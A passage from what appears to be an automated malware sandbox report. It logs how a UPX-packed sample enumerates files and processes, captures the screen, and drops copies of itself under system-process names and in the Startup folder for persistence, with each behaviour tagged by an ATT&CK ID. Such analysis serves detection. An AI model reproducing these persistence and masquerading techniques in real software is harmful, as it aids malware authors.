\"cx\": \"1\"\n \"cy\": \"1\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"419498975\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"419498975\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"419498975\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"419498975\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"419498975\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"419498975\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"419498975\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224805383\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224805383\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224805383\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224805383\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224805383\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224805383\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224805383\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224805383\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224805383\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224805383\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224805383\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"419498975\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter 4k51k4.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005712)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"4k51k4.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"352\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"392\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"400\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"456\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"492\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"508\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"516\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"612\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"688\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"776\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"832\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"860\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"896\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1124\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1264\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1316\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1452\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1560\"}\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1628\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" opened \"\\Device\\KsecDD\"\n \"4k51k4.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" has an entrypoint in section \"UPX1\"\n \"CSRSS .exe\" has an entrypoint in section \"UPX1\"\n \"services.exe\" has an entrypoint in section \"UPX1\"\n \"shell.exe\" has an entrypoint in section \"UPX1\"\n \"4k51k4.exe\" has an entrypoint in section \"UPX1\"\n \"IExplorer.exe\" has an entrypoint in section \"UPX1\"\n \"New Folder.exe\" has an entrypoint in section \"UPX1\"\n \"Data HAPUBWS.exe\" has an entrypoint in section \"UPX1\"\n \"Empty.pif\" has an entrypoint in section \"UPX1\"\n \"CSRSS.EXE.bin\" has an entrypoint in section \"UPX1\"\n \"SERVICES.EXE\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9C469.bin\" has an entrypoint in section \"UPX1\"\n \"SMSS.EXE\" has an entrypoint in section \"UPX1\"\n \"LSASS.EXE\" has an entrypoint in section \"UPX1\"\n \"MrHelloween.scr\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9C7EE.bin\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9C717.bin\" has an entrypoint in section \"UPX1\"\n \"WINLOGON.EXE\" has an entrypoint in section \"UPX1\"\n \"CSRSS.EXE\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9C46B.bin\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9C719.bin\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46776 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46870 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46773 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46849 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46890 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46677 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46840 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46761 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46776 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46810 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46871 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 46870 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 